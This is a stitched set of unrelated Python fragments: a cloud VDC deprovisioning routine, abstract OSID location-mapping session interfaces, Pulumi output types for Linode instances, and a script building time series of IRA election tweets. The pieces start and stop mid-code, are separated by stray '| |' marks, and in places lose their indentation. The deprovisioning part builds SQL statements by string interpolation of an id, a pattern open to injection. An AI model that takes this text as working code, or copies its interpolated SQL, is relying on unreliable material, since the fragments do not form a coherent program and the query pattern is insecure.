        #     "UPDATE tblResourcesCompute SET cpu=0,ram=0,network=0 WHERE Catagory='deployed' AND tblEntities='%s'" % dbid)
        for profile in get_next_group(db, dbid, group=entity_constants.profile_groups_deprovision_order):
            reset_status_and_uri(db, profile["id"], "Ready")
            if profile["entitytype"] == "server":
                # Servers additionally lose their console (noVNC) URL.
                db.execute_db("UPDATE tblServers SET novnc_url=NULL WHERE (id ='%s')" % profile["child_id"])
                db.execute_db(
                    "DELETE FROM tblAttachedEntities WHERE attachedentityid='%s' AND AttachedEntityType='physical' " %
                    profile["id"])
            if profile["entitytype"] == "volume":
                db.execute_db(
                    "DELETE FROM tblAttachedEntities WHERE attachedentityid='%s' AND AttachedEntityType='physical' " %
                    profile["id"])
        for service in get_next_service(db, dbid):
            reset_status_and_uri(db, service["id"], "Ready")
            db.execute_db(
                "DELETE FROM tblAttachedEntities WHERE attachedentityid='%s' AND AttachedEntityType='physical' " %
                service["id"])
        # Reset all network interfaces directly under the VDC, then the VDC itself.
        db.execute_db("UPDATE tblEntities SET EntityStatus = 'Ready', EntityMode = 'Ready', updated_at=now() "
                      "WHERE (EntityType = 'network_interface' AND ParentEntityId='%s' "
                      "AND deleted=0)" % dbid)
        db.execute_db("UPDATE tblEntities SET EntityStatus = 'Ready', EntityMode = 'Ready', updated_at=now() "
                      "WHERE (id='%s' "
                      "AND deleted=0)" % dbid)
        db.execute_db("DELETE FROM tblAttachedEntitiesStatus WHERE (vdcentityid='%s')" % dbid)
    except:
        cloud_utils.log_exception(sys.exc_info())
def json_default(o):
    """Serializer hook for ``json.dumps(..., default=json_default)``.

    Converts date/datetime values to ISO-8601 strings. Uses ``isinstance``
    so subclasses are handled too (``datetime.datetime`` is itself a
    subclass of ``datetime.date``, which exact ``type(...) is`` checks
    missed for other subclasses). Any other type falls through and returns
    None, preserving the original behavior.
    """
    if isinstance(o, (datetime.date, datetime.datetime)):
        return o.isoformat()
class DashBoard(object):
def | |
to complete request
:raise: ``Unimplemented`` -- ``supports_location_admin()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_admin()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationAdminSession
    @abc.abstractmethod
    def get_location_notification_session(self, location_receiver):
        """Gets the ``OsidSession`` associated with the location notification service.

        :param location_receiver: the notification callback
        :type location_receiver: ``osid.mapping.LocationReceiver``
        :return: a ``LocationNotificationSession``
        :rtype: ``osid.mapping.LocationNotificationSession``
        :raise: ``NullArgument`` -- ``location_receiver`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_notification()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_notification()`` is ``true``.*

        """
        return # osid.mapping.LocationNotificationSession
    @abc.abstractmethod
    def get_location_notification_session_for_map(self, location_receiver, map_id):
        """Gets the ``OsidSession`` associated with the location notification service for the given map.

        :param location_receiver: the notification callback
        :type location_receiver: ``osid.mapping.LocationReceiver``
        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``LocationNotificationSession``
        :rtype: ``osid.mapping.LocationNotificationSession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``location_receiver`` or ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_notification()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_notification()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.LocationNotificationSession
    @abc.abstractmethod
    def get_location_hierarchy_session(self):
        """Gets the ``OsidSession`` associated with the location hierarchy service.

        :return: a ``LocationHierarchySession``
        :rtype: ``osid.mapping.LocationHierarchySession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_hierarchy()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_hierarchy()`` is ``true``.*

        """
        return # osid.mapping.LocationHierarchySession

    # Spec-defined property alias for the zero-argument getter.
    location_hierarchy_session = abc.abstractproperty(fget=get_location_hierarchy_session)
    @abc.abstractmethod
    def get_location_hierarchy_session_for_map(self, map_id):
        """Gets the ``OsidSession`` associated with the location hierarchy service for the given map.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``LocationHierarchySession``
        :rtype: ``osid.mapping.LocationHierarchySession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_hierarchy()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_hierarchy()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.LocationHierarchySession
    @abc.abstractmethod
    def get_location_hierarchy_design_session(self):
        """Gets the ``OsidSession`` associated with the location hierarchy design service.

        :return: a ``LocationHierarchyDesignSession``
        :rtype: ``osid.mapping.LocationHierarchyDesignSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_hierarchy_design()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_hierarchy_design()`` is ``true``.*

        """
        return # osid.mapping.LocationHierarchyDesignSession

    # Spec-defined property alias for the zero-argument getter.
    location_hierarchy_design_session = abc.abstractproperty(fget=get_location_hierarchy_design_session)
    @abc.abstractmethod
    def get_location_hierarchy_design_session_for_map(self, map_id):
        """Gets the ``OsidSession`` associated with the location hierarchy design service for the given map.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``LocationHierarchyDesignSession``
        :rtype: ``osid.mapping.LocationHierarchyDesignSession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_hierarchy_design()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_hierarchy_design()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.LocationHierarchyDesignSession
    @abc.abstractmethod
    def get_location_map_session(self):
        """Gets the ``OsidSession`` to lookup location/map mappings.

        :return: a ``LocationMapSession``
        :rtype: ``osid.mapping.LocationMapSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_map()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_map()`` is ``true``.*

        """
        return # osid.mapping.LocationMapSession

    # Spec-defined property alias for the zero-argument getter.
    location_map_session = abc.abstractproperty(fget=get_location_map_session)
    @abc.abstractmethod
    def get_location_map_assignment_session(self):
        """Gets the ``OsidSession`` associated with assigning locations to maps.

        :return: a ``LocationMapAssignmentSession``
        :rtype: ``osid.mapping.LocationMapAssignmentSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_map_assignment()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_map_assignment()`` is ``true``.*

        """
        return # osid.mapping.LocationMapAssignmentSession

    # Spec-defined property alias for the zero-argument getter.
    location_map_assignment_session = abc.abstractproperty(fget=get_location_map_assignment_session)
    @abc.abstractmethod
    def get_location_smart_map_session(self, map_id):
        """Gets the ``OsidSession`` to manage location smart maps.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``LocationSmartMapSession``
        :rtype: ``osid.mapping.LocationSmartMapSession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_smart_map()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_smart_map()`` is ``true``.*

        """
        return # osid.mapping.LocationSmartMapSession
    @abc.abstractmethod
    def get_location_adjacency_session(self):
        """Gets the ``OsidSession`` associated with the location adjacency service.

        :return: a ``LocationAdjacencySession``
        :rtype: ``osid.mapping.LocationAdjacencySession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_adjacency()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_adjacency()`` is ``true``.*

        """
        return # osid.mapping.LocationAdjacencySession

    # Spec-defined property alias for the zero-argument getter.
    location_adjacency_session = abc.abstractproperty(fget=get_location_adjacency_session)
    @abc.abstractmethod
    def get_location_adjacency_session_for_map(self, map_id):
        """Gets the ``OsidSession`` associated with the location adjacency service for the given map.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``LocationAdjacencySession``
        :rtype: ``osid.mapping.LocationAdjacencySession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_adjacency()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_adjacency()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.LocationAdjacencySession
    @abc.abstractmethod
    def get_location_spatial_session(self):
        """Gets the ``OsidSession`` associated with the location spatial service.

        :return: a ``LocationSpatialSession``
        :rtype: ``osid.mapping.LocationSpatialSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_spatial()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_spatial()`` is ``true``.*

        """
        return # osid.mapping.LocationSpatialSession

    # Spec-defined property alias for the zero-argument getter.
    location_spatial_session = abc.abstractproperty(fget=get_location_spatial_session)
    @abc.abstractmethod
    def get_location_spatial_session_for_map(self, map_id):
        """Gets the ``OsidSession`` associated with the location spatial service for the given map.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``LocationSpatialSession``
        :rtype: ``osid.mapping.LocationSpatialSession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_location_spatial()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_location_spatial()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.LocationSpatialSession
    @abc.abstractmethod
    def get_resource_location_session(self):
        """Gets the ``OsidSession`` associated with the resource location service.

        :return: a ``ResourceLocationSession``
        :rtype: ``osid.mapping.ResourceLocationSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_resource_location()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_resource_location()`` is ``true``.*

        """
        return # osid.mapping.ResourceLocationSession

    # Spec-defined property alias for the zero-argument getter.
    resource_location_session = abc.abstractproperty(fget=get_resource_location_session)
    @abc.abstractmethod
    def get_resource_location_session_for_map(self, map_id):
        """Gets the ``OsidSession`` associated with the resource location service for the given map.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``ResourceLocationSession``
        :rtype: ``osid.mapping.ResourceLocationSession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_resource_location()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_resource_location()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.ResourceLocationSession
    @abc.abstractmethod
    def get_resource_location_update_session(self):
        """Gets the ``OsidSession`` associated with the resource location update service.

        :return: a ``ResourceLocationUpdateSession``
        :rtype: ``osid.mapping.ResourceLocationUpdateSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_resource_location_update()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_resource_location_update()`` is ``true``.*

        """
        return # osid.mapping.ResourceLocationUpdateSession

    # Spec-defined property alias for the zero-argument getter.
    resource_location_update_session = abc.abstractproperty(fget=get_resource_location_update_session)
    @abc.abstractmethod
    def get_resource_location_update_session_for_map(self, map_id):
        """Gets the ``OsidSession`` associated with the resource location update service for the given map.

        :param map_id: the ``Id`` of the ``Map``
        :type map_id: ``osid.id.Id``
        :return: a ``ResourceLocationUpdateSession``
        :rtype: ``osid.mapping.ResourceLocationUpdateSession``
        :raise: ``NotFound`` -- no map found by the given ``Id``
        :raise: ``NullArgument`` -- ``map_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_resource_location_update()`` or ``supports_visible_federation()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_resource_location_update()`` and
        ``supports_visible_federation()`` are ``true``*

        """
        return # osid.mapping.ResourceLocationUpdateSession
    @abc.abstractmethod
    def get_resource_location_notification_session(self, resource_location_receiver):
        """Gets the ``OsidSession`` associated with the resource location notification service.

        :param resource_location_receiver: the notification callback
        :type resource_location_receiver: ``osid.mapping.ResourceLocationReceiver``
        :return: a ``ResourceLocationNotificationSession``
        :rtype: ``osid.mapping.ResourceLocationNotificationSession``
        :raise: ``NullArgument`` -- ``resource_location_receiver`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_resource_location_notification()`` is ``false``

        *compliance: optional -- This method must be implemented if
        ``supports_resource_location_notification()`` is ``true``.*

        """
        return # osid.mapping.ResourceLocationNotificationSession
@abc.abstractmethod
def get_resource_location_notification_session_for_map(self, resource_location_receiver, map_id):
"""Gets the ``OsidSession`` associated with the resource location notification service for the given map.
:param resource_location_receiver: the notification callback
:type resource_location_receiver: ``osid.mapping.ResourceLocationReceiver``
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``ResourceLocationNotificationSession``
:rtype: ``osid.mapping.ResourceLocationNotificationSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``resource_location_receiver`` or ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location_notification()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
| |
to this `device` slot.
"""
return pulumi.get(self, "volume_id")
@pulumi.output_type
class InstanceConfigHelpers(dict):
    """Output type describing the helper settings of a Linode instance config."""

    @staticmethod
    def __key_warning(key: str):
        # Redirect camelCase wire keys to their snake_case property getters.
        suggestions = {
            "devtmpfsAutomount": "devtmpfs_automount",
            "modulesDep": "modules_dep",
            "updatedbDisabled": "updatedb_disabled",
        }
        suggest = suggestions.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in InstanceConfigHelpers. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        InstanceConfigHelpers.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        InstanceConfigHelpers.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 devtmpfs_automount: Optional[bool] = None,
                 distro: Optional[bool] = None,
                 modules_dep: Optional[bool] = None,
                 network: Optional[bool] = None,
                 updatedb_disabled: Optional[bool] = None):
        """
        :param bool distro: Controls the behavior of the Linode Config's Distribution Helper setting.
        :param bool modules_dep: Creates a modules dependency file for the Kernel you run.
        :param bool network: Controls the behavior of the Linode Config's Network Helper setting, used to automatically configure additional IP addresses assigned to this instance.
        :param bool updatedb_disabled: Disables updatedb cron job to avoid disk thrashing.
        """
        # Only record the fields the caller actually supplied.
        for prop, value in (
                ("devtmpfs_automount", devtmpfs_automount),
                ("distro", distro),
                ("modules_dep", modules_dep),
                ("network", network),
                ("updatedb_disabled", updatedb_disabled)):
            if value is not None:
                pulumi.set(__self__, prop, value)

    @property
    @pulumi.getter(name="devtmpfsAutomount")
    def devtmpfs_automount(self) -> Optional[bool]:
        # No upstream description is provided for this field.
        return pulumi.get(self, "devtmpfs_automount")

    @property
    @pulumi.getter
    def distro(self) -> Optional[bool]:
        """
        Controls the behavior of the Linode Config's Distribution Helper setting.
        """
        return pulumi.get(self, "distro")

    @property
    @pulumi.getter(name="modulesDep")
    def modules_dep(self) -> Optional[bool]:
        """
        Creates a modules dependency file for the Kernel you run.
        """
        return pulumi.get(self, "modules_dep")

    @property
    @pulumi.getter
    def network(self) -> Optional[bool]:
        """
        Controls the behavior of the Linode Config's Network Helper setting, used to automatically configure additional IP addresses assigned to this instance.
        """
        return pulumi.get(self, "network")

    @property
    @pulumi.getter(name="updatedbDisabled")
    def updatedb_disabled(self) -> Optional[bool]:
        """
        Disables updatedb cron job to avoid disk thrashing.
        """
        return pulumi.get(self, "updatedb_disabled")
@pulumi.output_type
class InstanceConfigInterface(dict):
    """Output type describing one network interface of a Linode instance config."""

    @staticmethod
    def __key_warning(key: str):
        # Only one camelCase wire key needs redirecting to its snake_case property.
        suggest = "ipam_address" if key == "ipamAddress" else None
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in InstanceConfigInterface. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        InstanceConfigInterface.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        InstanceConfigInterface.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 ipam_address: Optional[str] = None,
                 label: Optional[str] = None,
                 purpose: Optional[str] = None):
        """
        :param str ipam_address: This Network Interface’s private IP address in Classless Inter-Domain Routing (CIDR) notation.
        :param str label: The name of this interface. If the interface is a VLAN, a label is required.
        :param str purpose: The type of interface. (`public`, `vlan`)
        """
        # Only record the fields the caller actually supplied.
        supplied = {"ipam_address": ipam_address, "label": label, "purpose": purpose}
        for prop, value in supplied.items():
            if value is not None:
                pulumi.set(__self__, prop, value)

    @property
    @pulumi.getter(name="ipamAddress")
    def ipam_address(self) -> Optional[str]:
        """
        This Network Interface’s private IP address in Classless Inter-Domain Routing (CIDR) notation.
        """
        return pulumi.get(self, "ipam_address")

    @property
    @pulumi.getter
    def label(self) -> Optional[str]:
        """
        The name of this interface. If the interface is a VLAN, a label is required.
        """
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def purpose(self) -> Optional[str]:
        """
        The type of interface. (`public`, `vlan`)
        """
        return pulumi.get(self, "purpose")
@pulumi.output_type
class InstanceDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "authorizedKeys":
suggest = "authorized_keys"
elif key == "authorizedUsers":
suggest = "authorized_users"
elif key == "readOnly":
suggest = "read_only"
elif key == "rootPass":
suggest = "root_pass"
elif key == "stackscriptData":
suggest = "stackscript_data"
elif key == "stackscriptId":
suggest = "stackscript_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in InstanceDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
InstanceDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
InstanceDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
label: str,
size: int,
authorized_keys: Optional[Sequence[str]] = None,
authorized_users: Optional[Sequence[str]] = None,
filesystem: Optional[str] = None,
id: Optional[int] = None,
image: Optional[str] = None,
read_only: Optional[bool] = None,
root_pass: Optional[str] = None,
stackscript_data: Optional[Mapping[str, Any]] = None,
stackscript_id: Optional[int] = None):
"""
:param str label: The name of this interface. If the interface is a VLAN, a label is required.
:param int size: The size of the Disk in MB.
:param Sequence[str] authorized_keys: A list of SSH public keys to deploy for the root user on the newly created Linode. Only accepted if `image` is provided. *This value can not be imported.* *Changing `authorized_keys` forces the creation of a new Linode Instance.*
:param Sequence[str] authorized_users: A list of Linode usernames. If the usernames have associated SSH keys, the keys will be appended to the `root` user's `~/.ssh/authorized_keys` file automatically. *This value can not be imported.* *Changing `authorized_users` forces the creation of a new Linode Instance.*
:param str filesystem: The Disk filesystem can be one of: `"raw"`, `"swap"`, `"ext3"`, `"ext4"`, or `"initrd"` which has a max size of 32mb and can be used in the config `initrd` (not currently supported in this provider).
:param int id: The ID of the disk in the Linode API.
:param str image: An Image ID to deploy the Disk from. Official Linode Images start with linode/, while your Images start with private/. See /images for more information on the Images available for you to use. Examples are `linode/debian9`, `linode/fedora28`, `linode/ubuntu16.04lts`, `linode/arch`, and `private/12345`. See all images [here](https://api.linode.com/v4/linode/kernels). *Changing `image` forces the creation of a new Linode Instance.*
:param str root_pass: The initial password for the `root` user account. *This value can not be imported.* *Changing `root_pass` forces the creation of a new Linode Instance.* *If omitted, a random password will be generated but will not be stored in state.*
:param Mapping[str, Any] stackscript_data: An object containing responses to any User Defined Fields present in the StackScript being deployed to this Linode. Only accepted if 'stackscript_id' is given. The required values depend on the StackScript being deployed. *This value can not be imported.* *Changing `stackscript_data` forces the creation of a new Linode Instance.*
:param int stackscript_id: The StackScript to deploy to the newly created Linode. If provided, 'image' must also be provided, and must be an Image that is compatible with this StackScript. *This value can not be imported.* *Changing `stackscript_id` forces the creation of a new Linode Instance.*
"""
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "size", size)
if authorized_keys is not None:
pulumi.set(__self__, "authorized_keys", authorized_keys)
if authorized_users is not None:
pulumi.set(__self__, "authorized_users", authorized_users)
if filesystem is not None:
pulumi.set(__self__, "filesystem", filesystem)
if id is not None:
pulumi.set(__self__, "id", id)
if image is not None:
pulumi.set(__self__, "image", image)
if read_only is not None:
pulumi.set(__self__, "read_only", read_only)
if root_pass is not None:
pulumi.set(__self__, "root_pass", root_pass)
if stackscript_data is not None:
pulumi.set(__self__, "stackscript_data", stackscript_data)
if stackscript_id is not None:
pulumi.set(__self__, "stackscript_id", stackscript_id)
@property
@pulumi.getter
def label(self) -> str:
"""
The name of this interface. If the interface is a VLAN, a label is required.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def size(self) -> int:
"""
The size of the Disk in MB.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter(name="authorizedKeys")
def authorized_keys(self) -> Optional[Sequence[str]]:
"""
A list of SSH public keys to deploy for the root user on the newly created Linode. Only accepted if `image` is provided. *This value can not be imported.* *Changing `authorized_keys` forces the creation of a new Linode Instance.*
"""
return pulumi.get(self, "authorized_keys")
@property
@pulumi.getter(name="authorizedUsers")
def authorized_users(self) -> Optional[Sequence[str]]:
"""
A list of Linode usernames. If the usernames have associated SSH keys, the keys will be appended to the `root` user's `~/.ssh/authorized_keys` file automatically. *This value can not be imported.* *Changing `authorized_users` forces the creation of a new Linode Instance.*
"""
return pulumi.get(self, "authorized_users")
@property
@pulumi.getter
def filesystem(self) -> Optional[str]:
"""
The Disk filesystem can be one of: `"raw"`, `"swap"`, `"ext3"`, `"ext4"`, or `"initrd"` which has a max size of 32mb and can be used in the config `initrd` (not currently supported in this provider).
"""
return pulumi.get(self, "filesystem")
@property
@pulumi.getter
def id(self) -> Optional[int]:
"""
The ID | |
# Repository: kayzhou/election
import pendulum
from my_weapon import *
"""
针对 disk/all-url-tweets.json 进行分析
默认15分钟的粒度
"""
from pyloess import stl
# LOESS smoothing
def get_day(dt):
    """Truncate a parseable datetime string to midnight: "YYYY-MM-DD 00:00:00"."""
    parsed = pendulum.parse(dt)
    return parsed.format("YYYY-MM-DD 00:00:00")
def get_hour(dt):
    """Truncate a parseable datetime string to the hour: "YYYY-MM-DD HH:00:00"."""
    parsed = pendulum.parse(dt)
    return parsed.format("YYYY-MM-DD HH:00:00")
def get_15min(dt):
    """Floor a parseable datetime string to the start of its 15-minute bin.

    Returns a pendulum datetime (not a string), e.g. 12:38:27 -> 12:30:00.
    """
    parsed = pendulum.parse(dt)
    hour_start = pendulum.parse(parsed.format("YYYY-MM-DD HH:00:00"))
    # minute // 15 selects the same bucket the original four-way
    # comparison chain did, without the branching.
    return hour_start.add(minutes=15 * (parsed.minute // 15))
def get_15min_file():
    """Rewrite disk/user_time.txt with timestamps snapped to 15-minute bins.

    Each input line is "<id> <uid> <date> <time>"; the output line keeps the
    first two fields and replaces the timestamp with its 15-minute bucket.
    """
    # Fix: the input file was opened without `with` and never closed.
    with open("disk/user_time.txt") as src, open("disk/user_time_15Mins.txt", "w") as dst:
        for line in tqdm(src):
            w = line.strip().split()
            bucket = get_15min(w[2] + " " + w[3]).to_datetime_string()
            dst.write(f"{w[0]} {w[1]} {bucket}\n")
def cal_ts(dts, resolution="15Min"):
    """Count events per time bucket.

    dts is a sequence of parseable datetime strings; returns a pandas Series
    of counts resampled to `resolution` (summing duplicates per bucket).
    """
    counts = pd.to_datetime(dts).value_counts()
    return counts.resample(resolution).sum()
def cal_ts_day(dts):
    """Daily event counts over the span of the (time-ordered) datetimes.

    The index runs from the day of dts[0] through the day of dts[-1];
    days without events stay at 0.
    """
    index = pd.date_range(get_day(dts[0]), get_day(dts[-1]), freq='D')
    counts = pd.Series(0, index)
    for stamp in dts:
        counts[get_day(stamp)] += 1
    return counts
def cal_ts_48hours(dts):
    """Hourly event counts for the first 48 hours after the first datetime.

    Timestamps falling outside the 48-hour window are silently ignored.
    """
    index = pd.date_range(get_hour(dts[0]), periods=48, freq="H")
    counts = pd.Series(0, index)
    for stamp in dts:
        bucket = get_hour(stamp)
        if bucket in counts:
            counts[bucket] += 1
    return counts
def plot_day(i, url, sorted_dts, sorted_dts2=None, save=False):
    """Plot the daily spread of one URL (optionally with a second series).

    When `save` is truthy the figure goes to fig/{i}-{url}-overall-spread.pdf;
    otherwise it is shown interactively. The figure is always closed.
    """
    plt.figure(figsize=(10, 6))
    cal_ts_day(sorted_dts).plot()
    if sorted_dts2:
        cal_ts_day(sorted_dts2).plot()
    # Axis styling shared with plot_48hours.
    plt.ylabel('N of tweets with this fake news', fontsize=15)
    plt.xticks(fontsize=11)
    plt.yticks(fontsize=11)
    if save:
        plt.savefig('fig/{}-{}-overall-spread.pdf'.format(i, url), dpi=300)
    else:
        plt.show()
    plt.close()
def plot_48hours(i, url, sorted_dts, sorted_dts2=None, save=False):
    """Plot the first 48 hours of one URL's spread (optionally two series).

    When `save` is truthy the figure goes to fig/{i}-{url}-first-48-hours.pdf;
    otherwise it is shown interactively. The figure is always closed.
    """
    plt.figure(figsize=(10, 6))
    cal_ts_48hours(sorted_dts).plot()
    if sorted_dts2:
        cal_ts_48hours(sorted_dts2).plot()
    # Axis styling shared with plot_day.
    plt.ylabel('N of tweets with this fake news', fontsize=15)
    plt.xticks(fontsize=11)
    plt.yticks(fontsize=11)
    if save:
        plt.savefig('fig/{}-{}-first-48-hours.pdf'.format(i, url), dpi=300)
    else:
        plt.show()
    plt.close()
# from stldecompose import decompose, forecast
import matplotlib.ticker as ticker
# IRA tweet dump (election-period subset); consumed by get_tsss/get_tsss_user.
IRA_data = pd.read_csv("data/ira-tweets-ele.csv")
def format_date(x, pos=None):
    """Matplotlib tick formatter: render a datetime-like tick as YYYY-MM-DD.

    `pos` is accepted (and ignored) because FuncFormatter passes it.
    """
    # Removed leftover debug print: a formatter runs once per tick and
    # was spamming stdout on every draw.
    return x.strftime('%Y-%m-%d')
import pendulum
from datetime import datetime
def load_should_remove():
    """Load blackout timestamps and expand each into 24 hours of 15-min bins.

    Each line of data/should_be_removed_in_timeseries.txt is a
    "%Y-%m-%d %H:%M:%S" start time; the result lists every 15-minute
    Timestamp in the following 24 hours (4 * 24 bins per start).
    """
    should_remove_15Min = []
    # Fix: the input file was opened without `with` and never closed.
    with open("data/should_be_removed_in_timeseries.txt") as fh:
        for line in fh:
            _start = datetime.strptime(line.strip(), '%Y-%m-%d %H:%M:%S')
            for _dt in pd.date_range(start=_start, periods=4 * 24, freq="15Min"):
                should_remove_15Min.append(pd.to_datetime(_dt))
    return should_remove_15Min
# Load supporting datasets used by the analysis functions below.
should_remove_15Min = load_should_remove()
user_support = json.load(open("disk/user_hillary_trump.json"))
# Classify each user by which candidate they tweeted about more.
# NOTE(review): assumes v == (hillary_count, trump_count), so "C" = Clinton
# leaning, "T" = Trump leaning, "U" = tied/undecided — confirm against the
# producer of user_hillary_trump.json.
users_opinion = {}
opinion = Counter()
for uid, v in tqdm(user_support.items()):
    if v[0] > v[1]:
        users_opinion[uid] = "C"
        opinion["C"] += 1
    elif v[0] < v[1]:
        users_opinion[uid] = "T"
        opinion["T"] += 1
    else:
        users_opinion[uid] = "U"
        opinion["U"] += 1
from fake_identify import Are_you_IRA
# IRA-account detector; exposes check(uid) and uncover(userid).
Putin = Are_you_IRA()
def get_tsss(cN, layer="one"):
    """
    Build 15-minute activity time series for IRA and non-IRA accounts in
    community cN, split further by influencer status and candidate support,
    and pickle the combined DataFrame to data/tsts/C{cN}-{layer}-layer.pl.
    """
    def get_ts(IRA_nodes):
        # Tweet-count series for IRA accounts found in the given node set.
        dts = []
        for i, row in tqdm(IRA_data.iterrows()):
            u = Putin.uncover(row.userid)
            if u in IRA_nodes:
                _dt = row.tweet_time
                # Move to EST
                _dt = pendulum.parse(_dt).add(hours=-4).to_datetime_string()
                dts.append(_dt)
        ts = pd.to_datetime(dts)
        ts = ts.value_counts()
        ts = ts.resample("15Min").sum()
        # Restrict to the campaign window and drop blackout bins.
        ts = ts[(ts.index >= "2016-06-01") & (ts.index < "2016-11-09")]
        ts = ts[~ts.index.isin(should_remove_15Min)]
        return ts
    def get_non(non_IRA_nodes):
        # Tweet-count series for the given non-IRA node set, read from the
        # raw per-tweet log disk/user_time.txt ("<id> <uid> <date> <time>").
        non_dts = []
        for line in tqdm(open('disk/user_time.txt')):
